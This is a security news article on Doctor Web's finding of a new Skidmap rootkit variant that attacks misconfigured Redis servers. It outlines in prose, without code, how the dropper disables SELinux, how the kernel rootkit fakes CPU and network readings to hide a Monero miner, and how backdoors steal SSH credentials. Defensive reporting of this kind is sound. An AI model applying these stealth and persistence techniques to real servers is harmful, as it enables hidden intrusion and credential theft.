New Skidmap Rootkit Variant Targets Enterprise Linux Servers via Redis Vulnerabilities
Cybersecurity analysts at Doctor Web have identified a new modification of the notorious Skidmap mining trojan targeting Linux machines. This advanced rootkit operates as a malicious kernel module, adeptly concealing its cryptocurrency mining activities by providing falsified system information about CPU usage and network activity. The attack appears indiscriminate but primarily affects the enterprise sector—large servers and cloud environments—where mining efficiency and profits can be maximized.
The attack exploits vulnerabilities and misconfigurations in the Redis database management system, the world’s most popular NoSQL database used by giants like X (formerly Twitter), Airbnb, and Amazon. While Redis offers maximum performance and supports various data types and programming languages, it was never intended for edge-of-network deployment. This limitation results in basic security features in its default configuration and a lack of access control and encryption mechanisms in versions prior to 6.
In 2023 alone, Redis experienced 12 vulnerabilities, three of which were deemed “Serious.” The growing number of compromised servers installing mining programs piqued the interest of Doctor Web’s virus lab. To study the attacks firsthand, they set up an unprotected Redis server as a honeypot, which was attacked 10,000 to 14,000 times monthly over a year. Recently, the server was compromised by the anticipated Skidmap trojan modification, but with an unexpected twist: cybercriminals used a new method to hide the miner’s activity and installed four backdoors simultaneously.
First making headlines in 2019, the Skidmap trojan specializes in targeting enterprise networks to maximize stealth mining profits. Despite five years since its debut, its core operation remains unchanged:
- Exploitation: The trojan infiltrates systems by exploiting vulnerabilities or misconfigured software.
- Dropper Deployment: Attackers added tasks to the system scheduler, downloading the Linux.MulDrop.142 dropper every 10 minutes.
- System Checks and Disabling Security: The dropper checks the OS kernel version and disables the SELinux security module.
- Payload Unpacking: It unpacks:
- Linux.Rootkit.400 rootkit
- Linux.BtcMine.815 miner
- Linux.BackDoor.Pam.8/9 and Linux.BackDoor.SSH.425/426 backdoors
The dropper is notable for its size, containing about 60 executables for various Linux distributions, primarily Debian and Red Hat Enterprise Linux, common in server environments.
Once installed, the rootkit intercepts numerous system calls, generating fake responses to administrative diagnostic commands. Intercepted functions include those reporting:
- Average CPU usage
- Network activity on specific ports
- File directory listings
It also monitors all kernel modules being loaded, preventing those capable of detecting its presence from running. This comprehensive obfuscation thoroughly hides all aspects of the miner’s cryptocurrency activities—computation, hash transmission, and job reception.
The attack installs four backdoors to:
- Collect SSH credentials from the compromised machine and send them to attackers
- Create a master password for all system accounts (encrypted using a Caesar cipher with a four-letter offset)
Additionally, the Linux.BackDoor.RCTL.2 remote access trojan is installed, allowing attackers to send commands and exfiltrate data via an encrypted connection that the trojan initiates, effectively bypassing routing issues.
The attackers deploy the xmrig program to mine cryptocurrencies, notably Monero, known for its transaction anonymity and popularity on the darknet. Detecting such a miner cloaked by a rootkit in server clusters is exceptionally challenging. With diagnostic data spoofed, potential indicators of compromise include:
- Excessive power consumption
- Increased heat generation
However, attackers may adjust the miner’s settings to balance performance and stealth, further reducing the likelihood of detection.
